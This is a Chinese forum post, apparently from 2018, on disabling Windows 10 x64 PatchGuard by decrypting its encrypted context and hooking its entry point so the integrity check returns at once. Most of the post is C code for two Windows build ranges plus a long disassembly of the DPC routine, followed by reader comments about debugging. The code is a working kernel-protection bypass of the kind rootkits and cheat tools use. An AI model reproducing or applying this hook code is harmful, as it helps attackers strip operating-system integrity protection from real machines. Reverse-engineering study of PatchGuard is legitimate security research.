-
-
攻破 Window AMD64 平台的 PatchGuard - 让 PatchGuard Context 失效
-
发表于: 2018-11-27 22:37
-
前文说到如何找到加密的 PatchGuard Context, 先来看一下 CmpAppendDllSection (window 10 build 10.0.17763.1) 函数 :
从函数内部,很轻易的就可以分析出头部的地址的计算方法, Context + *(LONG*)(Context + 7e8h(各版本不同)), 再来看一下入口函数:
这里可以看到 14034eed 这里请了DR7 寄存器, 让硬件断点失效, 所以调试的时候硬件断点要放在这个地址之前, 再来看一下结尾部分的代码:
函数在结束的时候进入了SdbpCheckDll,
这个函数什么也没做, 就是把栈和寄存器清空了.
看过很多别出心裁的方法让
PatchGuard 失效, 我使用的方法比较简单, 直接HOOK入口点让代码正常返回, 这里有两种情况, 先看一下版本号小于 17134, 没有开启btc的情况 :
VOID
NTAPI
SetNewEntryForEncryptedContext(
__inout PPATCHGUARD_BLOCK PatchGuardBlock,
__in PVOID PatchGuardContext,
__in ULONG64 RorKey
)
{
ULONG64 LastRorKey = 0;
ULONG RvaOfEntry = 0;
ULONG64 FieldBuffer[PG_COMPARE_FIELDS_COUNT] = { 0 };
ULONG FieldIndex = 0;
ULONG Index = 0;
PCHAR ControlPc = NULL;
// 这里先取 RVA 的偏移, 8字节对齐, 计算密钥的加密次数
FieldIndex = (PatchGuardBlock->RvaOffsetOfEntry -
PatchGuardBlock->SizeOfCmpAppendDllSection) / sizeof(ULONG64);
// 复制到缓存中
RtlCopyMemory(
FieldBuffer,
(PCHAR)PatchGuardContext + (PatchGuardBlock->RvaOffsetOfEntry & ~7),
sizeof(FieldBuffer));
// 计算缓存的最后一个密钥
LastRorKey = RorKey;
for (Index = 0;
Index < FieldIndex;
Index++) {
LastRorKey = __ROL64(LastRorKey, Index);
}
// 解密缓存
for (Index = 0;
Index < RTL_NUMBER_OF(FieldBuffer);
Index++) {
LastRorKey = __ROL64(LastRorKey, FieldIndex + Index);
FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
}
// 计算入口的地址
RvaOfEntry = *(PULONG)((PCHAR)FieldBuffer + (PatchGuardBlock->RvaOffsetOfEntry & 7));
// 计算密钥的加密次数
FieldIndex = (RvaOfEntry - PatchGuardBlock->SizeOfCmpAppendDllSection) / sizeof(ULONG64);
// 复制入口的代码到缓存 这里考虑到对齐 需要最少 24 个字节
RtlCopyMemory(
FieldBuffer,
(PCHAR)PatchGuardContext + (RvaOfEntry & ~7),
sizeof(FieldBuffer));
// 计算缓存的最后一个密钥
LastRorKey = RorKey;
for (Index = 0;
Index < FieldIndex;
Index++) {
LastRorKey = __ROL64(LastRorKey, Index);
}
// 解密缓存
for (Index = 0;
Index < RTL_NUMBER_OF(FieldBuffer);
Index++) {
LastRorKey = __ROL64(LastRorKey, FieldIndex + Index);
FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
}
// 生成 HOOK 代码 "\xff\x25\x00\x00\x00\x00"
ControlPc = (PCHAR)FieldBuffer + (RvaOfEntry & 7);
BuildJumpCode(
PatchGuardBlock->_ClearEncryptedContext._ShellCode,
&ControlPc);
// 重新加密缓存
while (Index--) {
FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
LastRorKey = __ROR64(LastRorKey, FieldIndex + Index);
}
// 替换掉原始加密数据
RtlCopyMemory(
(PCHAR)PatchGuardContext + (RvaOfEntry & ~7),
FieldBuffer,
sizeof(FieldBuffer));
}
在 17134 版本之后由于 RVA 被加密, 并且无法正常加密 CONTEXT, 所以我采用了另外一种方法去找入口点, 方法类似上文找Context 的方法, 由4个Field 碰撞成功已经可以确认这是一个 PatchGuard 的 Context, 继续用入口点的真实代码去碰撞这段内存, 就可以100% 命中.
下面看代码,
VOID
NTAPI
SetNewEntryForEncryptedWithBtcContext(
__inout PPATCHGUARD_BLOCK PatchGuardBlock,
__in PVOID PatchGuardContext,
__in SIZE_T ContextSize
)
{
ULONG64 RorKey = 0;
ULONG64 LastRorKey = 0;
ULONG LastRorKeyOffset = 0;
ULONG64 FieldBuffer[PG_COMPARE_FIELDS_COUNT] = { 0 };
ULONG FieldIndex = 0;
ULONG AlignOffset = 0;
ULONG Index = 0;
PULONG64 ControlPc = NULL;
PULONG64 TargetPc = NULL;
ULONG CompareCount = 0;
// 由于头部的第一个字节可能不对齐 所以我们最多可能需要循环 7 次
CompareCount = (ContextSize - PatchGuardBlock->SizeOfCmpAppendDllSection) / 8 - 1;
for (AlignOffset = 0;
AlignOffset < 8;
AlignOffset++) {
ControlPc = (PULONG64)((PCHAR)PatchGuardBlock->EntryPoint + AlignOffset);
TargetPc = (PULONG64)((PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection);
for (Index = 0;
Index < CompareCount;
Index++) {
RorKey = TargetPc[Index + 1] ^ ControlPc[1];
LastRorKey = RorKey;
RorKey = __ROR64(RorKey, Index + 1);
RorKey = _btc64(RorKey, RorKey);
if ((TargetPc[Index] ^ RorKey) == ControlPc[0]) {
// 命中数据
goto found;
}
}
}
found:
// 判断没有没命中 当然这几乎不太可能发生
if (Index != CompareCount) {
// 计算对齐点
FieldIndex = Index - (0 == (AlignOffset & 7) ? 0 : 1);
LastRorKeyOffset = 2 + (0 == (AlignOffset & 7) ? 0 : 1);
// 复制代码到缓存
RtlCopyMemory(
FieldBuffer,
(PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection + FieldIndex * 8,
sizeof(FieldBuffer));
// 解密缓存代码
RorKey = LastRorKey;
Index = LastRorKeyOffset;
while (Index--) {
FieldBuffer[Index] = FieldBuffer[Index] ^ RorKey;
RorKey = __ROR64(RorKey, FieldIndex + Index);
RorKey = _btc64(RorKey, RorKey);
}
// 生成 HOOK 代码
ControlPc = (PCHAR)FieldBuffer + 8 - AlignOffset;
BuildJumpCode(
PatchGuardBlock->_ClearEncryptedContext._ShellCode,
&ControlPc);
// 重新加密代码
RorKey = LastRorKey;
Index = LastRorKeyOffset;
while (Index--) {
FieldBuffer[Index] = FieldBuffer[Index] ^ RorKey;
RorKey = __ROR64(RorKey, FieldIndex + Index);
RorKey = _btc64(RorKey, RorKey);
}
// 写回去
RtlCopyMemory(
(PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection + FieldIndex * 8,
FieldBuffer,
sizeof(FieldBuffer));
}
}
再来看一下HOOK后的操作 :
add rsp, 30h ret
讲下这里 为啥是 30h, 入口是从CmpAppendDllSection 进入的 入口代码是 :
28h + call 压入的ret 地址 刚好是30h 这样就返回了上层调用函数, 因为PatchGuard 实际上什么也没干所以直接就可以返回了, 到这里加密 Context 部分的操作要点基本就说完了, 当 Context 已经解密并且已经在执行的时候应该怎么办, 这个留到下节再说. 最后我在贴一个DPC 触发异常进入CmpAppendDllSection 的代码, 当然只是10种解密中的一个, 有兴趣可以调试看看:
sub rsp, 28h call rax
.text:00000001401CA89A ExpCenturyDpcRoutine$fin$0: ; DATA XREF: .rdata:00000001403D09AC↓o .text:00000001401CA89A ; .pdata:000000014047B220↓o .text:00000001401CA89A ; __finally // owned by 14015AABE .text:00000001401CA89A 40 53 push rbx .text:00000001401CA89C 55 push rbp .text:00000001401CA89D 48 83 EC 38 sub rsp, 38h .text:00000001401CA8A1 48 8B EA mov rbp, rdx .text:00000001401CA8A4 88 4D 50 mov [rbp+50h], cl .text:00000001401CA8A7 84 C9 test cl, cl .text:00000001401CA8A9 0F 84 0E 02 00 00 jz loc_1401CAABD .text:00000001401CA8AF E9 36 01 00 00 jmp loc_1401CA9EA .text:00000001401CA8B4 ; --------------------------------------------------------------------------- .text:00000001401CA8B4 .text:00000001401CA8B4 loc_1401CA8B4: ; CODE XREF: ExpCenturyDpcRoutine+7004C↓j .text:00000001401CA8B4 45 33 D2 xor r10d, r10d .text:00000001401CA8B7 44 89 55 54 mov [rbp+54h], r10d .text:00000001401CA8BB 48 8B 5D 38 mov rbx, [rbp+38h] .text:00000001401CA8BF .text:00000001401CA8BF loc_1401CA8BF: ; CODE XREF: ExpCenturyDpcRoutine+6FF1F↓j .text:00000001401CA8BF 4D 8B 01 mov r8, [r9] .text:00000001401CA8C2 4C 89 85 18 01 00 00 mov [rbp+118h], r8 .text:00000001401CA8C9 49 8B D0 mov rdx, r8 .text:00000001401CA8CC 48 8B 05 95 AD 2F 00 mov rax, cs:KiWaitNever .text:00000001401CA8D3 48 33 D0 xor rdx, rax .text:00000001401CA8D6 8B C8 mov ecx, eax .text:00000001401CA8D8 48 D3 C2 rol rdx, cl .text:00000001401CA8DB 48 33 D3 xor rdx, rbx .text:00000001401CA8DE 48 0F CA bswap rdx .text:00000001401CA8E1 48 33 15 80 AF 2F 00 xor rdx, cs:KiWaitAlways .text:00000001401CA8E8 49 89 11 mov [r9], rdx .text:00000001401CA8EB 41 8B C2 mov eax, r10d .text:00000001401CA8EE 49 0F AF C3 imul rax, r11 .text:00000001401CA8F2 48 03 C2 add rax, rdx .text:00000001401CA8F5 49 89 01 mov [r9], rax .text:00000001401CA8F8 41 8B C8 mov ecx, r8d .text:00000001401CA8FB F7 D1 not ecx .text:00000001401CA8FD 83 E1 3F and ecx, 3Fh .text:00000001401CA900 B8 C8 00 00 00 mov eax, 0C8h .text:00000001401CA905 41 2B C2 sub eax, r10d .text:00000001401CA908 41 0F AF C2 imul eax, r10d .text:00000001401CA90C 48 D3 C8 ror rax, cl .text:00000001401CA90F 48 33 D8 xor rbx, rax .text:00000001401CA912 48 89 5D 38 mov [rbp+38h], rbx .text:00000001401CA916 41 83 E0 3F and r8d, 3Fh .text:00000001401CA91A 41 8A C8 mov cl, r8b .text:00000001401CA91D 48 D3 C3 rol rbx, cl .text:00000001401CA920 48 89 5D 38 mov [rbp+38h], rbx .text:00000001401CA924 49 03 DB add rbx, r11 .text:00000001401CA927 48 89 5D 38 mov [rbp+38h], rbx .text:00000001401CA92B 45 33 C0 xor r8d, r8d .text:00000001401CA92E 44 89 45 58 mov [rbp+58h], r8d .text:00000001401CA932 .text:00000001401CA932 loc_1401CA932: ; CODE XREF: ExpCenturyDpcRoutine+6FF0A↓j .text:00000001401CA932 41 0F B6 01 movzx eax, byte ptr [r9] .text:00000001401CA936 83 E0 0F and eax, 0Fh .text:00000001401CA939 0F B6 54 05 40 movzx edx, byte ptr [rbp+rax+40h] .text:00000001401CA93E 49 83 21 F0 and qword ptr [r9], 0FFFFFFFFFFFFFFF0h .text:00000001401CA942 49 0B 11 or rdx, [r9] .text:00000001401CA945 49 89 11 mov [r9], rdx .text:00000001401CA948 48 C1 CA 04 ror rdx, 4 .text:00000001401CA94C 49 89 11 mov [r9], rdx .text:00000001401CA94F 41 FF C0 inc r8d .text:00000001401CA952 44 89 45 58 mov [rbp+58h], r8d .text:00000001401CA956 41 83 F8 10 cmp r8d, 10h .text:00000001401CA95A 72 D6 jb short loc_1401CA932 .text:00000001401CA95C 49 83 C1 08 add r9, 8 .text:00000001401CA960 4C 89 4D 60 mov [rbp+60h], r9 .text:00000001401CA964 41 FF C2 inc r10d .text:00000001401CA967 44 89 55 54 mov [rbp+54h], r10d .text:00000001401CA96B 41 83 FA 19 cmp r10d, 19h .text:00000001401CA96F 0F 82 4A FF FF FF jb loc_1401CA8BF .text:00000001401CA975 48 B9 F5 6F 1B AD 5F 93 44 62 mov rcx, 6244935FAD1B6FF5h .text:00000001401CA97F 49 8B 03 mov rax, [r11] .text:00000001401CA982 48 33 C1 xor rax, rcx .text:00000001401CA985 48 89 45 38 mov [rbp+38h], rax .text:00000001401CA989 48 8B 45 38 mov rax, [rbp+38h] .text:00000001401CA98D 48 B9 DB 27 2A BC 17 A2 15 6A mov rcx, 6A15A217BC2A27DBh .text:00000001401CA997 48 33 C1 xor rax, rcx .text:00000001401CA99A 48 89 45 38 mov [rbp+38h], rax .text:00000001401CA99E 41 C6 03 2E mov byte ptr [r11], 2Eh ; 写入 CmpAppendDllSection 头部4字节解密数据 .text:00000001401CA9A2 41 C6 43 01 48 mov byte ptr [r11+1], 48h .text:00000001401CA9A7 41 C6 43 02 31 mov byte ptr [r11+2], 31h .text:00000001401CA9AC 41 C6 43 03 11 mov byte ptr [r11+3], 11h .text:00000001401CA9B1 45 33 C9 xor r9d, r9d .text:00000001401CA9B4 45 33 C0 xor r8d, r8d .text:00000001401CA9B7 48 8B 55 38 mov rdx, [rbp+38h] .text:00000001401CA9BB 49 8B CB mov rcx, r11 .text:00000001401CA9BE 49 8B C3 mov rax, r11 .text:00000001401CA9C1 E8 4A ED FE FF call _guard_dispatch_icall ;这里进入 CmpAppendDllSection .text:00000001401CA9C6 C7 45 5C 01 00 00 00 mov dword ptr [rbp+5Ch], 1 .text:00000001401CA9CD 8B 45 30 mov eax, [rbp+30h] .text:00000001401CA9D0 83 C0 02 add eax, 2 .text:00000001401CA9D3 89 45 30 mov [rbp+30h], eax .text:00000001401CA9D6 48 8D 15 FD 00 F9 FF lea rdx, loc_14015AADA .text:00000001401CA9DD 48 8B 8D 38 01 00 00 mov rcx, [rbp+138h] .text:00000001401CA9E4 E8 77 42 FC FF call _local_unwind .text:00000001401CA9E9 90 nop .text:00000001401CA9EA .text:00000001401CA9EA loc_1401CA9EA: ; CODE XREF: ExpCenturyDpcRoutine+6FE5F↑j .text:00000001401CA9EA 8B 45 30 mov eax, [rbp+30h] .text:00000001401CA9ED 83 F8 02 cmp eax, 2 .text:00000001401CA9F0 0F 85 AB 00 00 00 jnz loc_1401CAAA1 .text:00000001401CA9F6 48 8B 8D CA 00 00 00 mov rcx, [rbp+0CAh] .text:00000001401CA9FD 48 89 8D E8 00 00 00 mov [rbp+0E8h], rcx .text:00000001401CAA04 4C 8B 85 C2 00 00 00 mov r8, [rbp+0C2h] .text:00000001401CAA0B 48 8B 85 CA 00 00 00 mov rax, [rbp+0CAh] .text:00000001401CAA12 48 89 85 00 01 00 00 mov [rbp+100h], rax .text:00000001401CAA19 48 8B 55 7A mov rdx, [rbp+7Ah] .text:00000001401CAA1D 49 D3 C8 ror r8, cl .text:00000001401CAA20 8B C8 mov ecx, eax .text:00000001401CAA22 48 D3 C2 rol rdx, cl .text:00000001401CAA25 4C 8B 5A 40 mov r11, [rdx+40h] .text:00000001401CAA29 4C 89 5D 38 mov [rbp+38h], r11 .text:00000001401CAA2D 4D 33 D8 xor r11, r8 .text:00000001401CAA30 48 B8 00 00 00 00 00 80 FF FF mov rax, 0FFFF800000000000h .text:00000001401CAA3A 4C 0B D8 or r11, rax .text:00000001401CAA3D 4C 89 9D 10 01 00 00 mov [rbp+110h], r11 .text:00000001401CAA44 4D 8B CB mov r9, r11 .text:00000001401CAA47 4C 89 5D 60 mov [rbp+60h], r11 .text:00000001401CAA4B 41 8B CB mov ecx, r11d .text:00000001401CAA4E 83 E1 3F and ecx, 3Fh .text:00000001401CAA51 49 8B C3 mov rax, r11 .text:00000001401CAA54 48 D3 C8 ror rax, cl .text:00000001401CAA57 48 89 45 38 mov [rbp+38h], rax .text:00000001401CAA5B C7 45 40 09 0A 0C 01 mov dword ptr [rbp+40h], 10C0A09h .text:00000001401CAA62 C7 45 44 0F 00 05 0E mov dword ptr [rbp+44h], 0E05000Fh .text:00000001401CAA69 C7 45 48 04 03 07 0D mov dword ptr [rbp+48h], 0D070304h .text:00000001401CAA70 C7 45 4C 08 06 02 0B mov dword ptr [rbp+4Ch], 0B020608h .text:00000001401CAA77 33 D2 xor edx, edx .text:00000001401CAA79 89 55 54 mov [rbp+54h], edx .text:00000001401CAA7C 8B C2 mov eax, edx .text:00000001401CAA7E 4C 8D 45 40 lea r8, [rbp+40h] .text:00000001401CAA82 4C 03 C0 add r8, rax .text:00000001401CAA85 .text:00000001401CAA85 loc_1401CAA85: ; CODE XREF: ExpCenturyDpcRoutine+7004A↓j .text:00000001401CAA85 41 8A 08 mov cl, [r8] .text:00000001401CAA88 83 F1 09 xor ecx, 9 .text:00000001401CAA8B 88 4C 15 40 mov [rbp+rdx+40h], cl .text:00000001401CAA8F FF C2 inc edx .text:00000001401CAA91 89 55 54 mov [rbp+54h], edx .text:00000001401CAA94 49 FF C0 inc r8 .text:00000001401CAA97 83 FA 10 cmp edx, 10h .text:00000001401CAA9A 72 E9 jb short loc_1401CAA85 .text:00000001401CAA9C E9 13 FE FF FF jmp loc_1401CA8B4 .text:00000001401CAAA1 ; --------------------------------------------------------------------------- .text:00000001401CAAA1 .text:00000001401CAAA1 loc_1401CAAA1: ; CODE XREF: ExpCenturyDpcRoutine+6FFA0↑j .text:00000001401CAAA1 48 8B 85 CA 00 00 00 mov rax, [rbp+0CAh] .text:00000001401CAAA8 48 89 85 40 01 00 00 mov [rbp+140h], rax .text:00000001401CAAAF 48 8B 95 C2 00 00 00 mov rdx, [rbp+0C2h] .text:00000001401CAAB6 8B C8 mov ecx, eax .text:00000001401CAAB8 48 D3 CA ror rdx, cl .text:00000001401CAABB 8B 02 mov eax, [rdx] .text:00000001401CAABD .text:00000001401CAABD loc_1401CAABD: ; CODE XREF: ExpCenturyDpcRoutine+6FE59↑j .text:00000001401CAABD 48 83 C4 38 add rsp, 38h .text:00000001401CAAC1 5D pop rbp .text:00000001401CAAC2 5B pop rbx .text:00000001401CAAC3 C3 retn
源码 :Shark
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
前面说了,CmpAppendDllSection本身双加密了,暴力搜索搜不到的 |
|
|
|
|
|
DeviceGuard了解一下 |
|
|
|
|
|
不止某地,拆迁6也有人用上了。 |
|
|
|
|
|
|
|
|
|
|
|
如果是乱码 看看是不是ror的计算次数搞错了 另外PatchGuardEntryPoint 这段搜索代码 是从ntos文件中获取的 |
|
|
win8.1 9600.17415上面,PatchGuardEntryPoint相对于上下文的RVA是存在上下文+0x420处,在0x424和0x428处还存了RtlLookupFunctionEntryEx和FsRtlUninitializeSmallMcb相对于上下文的RVA。我每次解密上下文,这三处的值都是固定不变的,这说明我的ROR计算次数应该没问题。PatchGuardEntryPoint的头部指令也是从ntos中重新提取的。 |
|
|
这就不太清楚了 根据RVA算下地址看看 会不会是已经被修改了 |
hzqst
